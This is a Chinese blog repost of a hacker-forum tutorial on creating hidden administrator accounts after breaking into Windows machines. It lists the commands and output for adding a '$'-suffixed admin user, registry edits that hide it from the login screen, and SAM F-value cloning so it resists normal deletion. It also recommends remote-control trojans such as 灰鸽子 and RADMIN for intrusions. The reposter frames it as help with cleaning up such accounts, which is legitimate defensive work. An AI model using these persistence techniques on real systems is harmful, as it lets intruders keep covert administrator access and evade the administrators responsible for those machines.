mzjj.net

这篇文章是今天清理被入侵的服务器时在中国黑客联盟上找到的，主要是对入侵中建立隐藏帐户的手法进行一点介绍，作者自己说技术含量低主要还是针对新手。 ********************************************** 1： $利用 一般在入侵时如果建立用户的话都会加上$，命令如下： C:\Documents and Settings\pwolf>net user w$ cool /add 命令成功完成。 添加到管理员组: C:\Documents and Settings\pwolf>net localgroup administrators w$ /add 命令成功完成。 在用户名后加上$，用net user命令是查不出来的，如下： C:\Documents and Settings\pwolf>net user \\PWOLF-E39196738 的用户帐户 ------------------------------------------------------------------------------- __vmware_user__ Administrator Guest HelpAssistant SUPPORT_388945a0 命令成功完成。 而查询管理员组（刚才已提为管理员）是是可以看到的，如： C:\Documents and Settings\pwolf>net localgroup administrators 别名 administrators 注释 管理员对计算机/域有不受限制的完全访问权 成员 ------------------------------------------------------------------------------- Administrator pwolf w$ 命令成功完成。 例外：对于XP系统，即使用户名后加$,在登陆界面 也会显示我们建得用户，这里只要在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 下将我们所建用户的表项的DWORD值改为0 即可，如果没有没有这个项可以新建，这里就是w$了。 在入侵XP系统时 ，最好不要添加用户，因为即使对方开启了终端服务（3389），XP也是不支持多用户的，还是开它的4899（RADMIN）或是灰鸽子等其他的远程控制软件。 2，网上流传的建立隐藏帐户的方法 这种方法网上很多教程，这里也简单介绍。 接上一步骤： 1。打开注册表编辑器（regedit），到HKEY_LOCAL_MACHINE\SAM\SAM 下 如果看不到子键，选中 HKEY_LOCAL_MACHINE\SAM\SAM然后右键-权限，将你所登陆的用户名添加进去，并且赋予完全控制权力。然后打开注册表（regedit)到HKLM\SAM\SAM\Domains\Account\Users中，这里保存里用户的信息，下面的十六进制项都是用户的sid，比如用户Administrator的sid是000001F4，guest的sid是000001F5。将相应的注册表项 w$,000003FA(w$对应的SID项），000003FB（管理员对应的注册表项,我用的是pwolf也是管理员身份）导出为w.reg，000003FA.reg,000003FB.reg,然后编辑REG文件将管理员（000003FB）的F值 覆盖000003FA的F值,后将000003FA.REG(修改完F值后的)的内容合并到W.REG. 附：对于修改注册表的访问权限的设置 ，在XP，2003里只要打开regedit就可以了再里面设置同上步骤，而对于2000要先打开regedt32给予SAM的访问权限，然后在打开注册表（REGEDIT）就可以看到SAM下的子键。 2。删除用户W$. 命令： NET USER W$ /DEL . 然后导入WOLF.REG。 这样建立的用户一开始在管理工具和命令行下都是看不到的,在注册表里还是能看到的（利用AFX Rootkit 2005可以隐藏，没有时间写以后再说 了）。但重启后在管理工具-计算机管理-本地用户和组里还是能看到的，具体分析看这篇文章http://www.cnhacker.com/bbs/read.php?tid=25430&fpage=1（我在XP下测试是这种情况） 还有一种情况就是这个用户在CMD 和计算机管理里 直接删是删不了, 提示:用户不属于这个组! 安全模式也是如此。 只能到 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 下将相关项删掉。 在XP里这种方法即使不修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList下我们所建用户的表项的DWORD值，在登陆界面也不会显示的。 ********************************************** 今天清理被入侵的那台服务器上被加的用户就是属于在CMD和计算机管理里都删不掉的，根据上面的方法最终还是删掉了。把本文到这里贴出来，希望能对和遇上我一样的朋友有点帮助。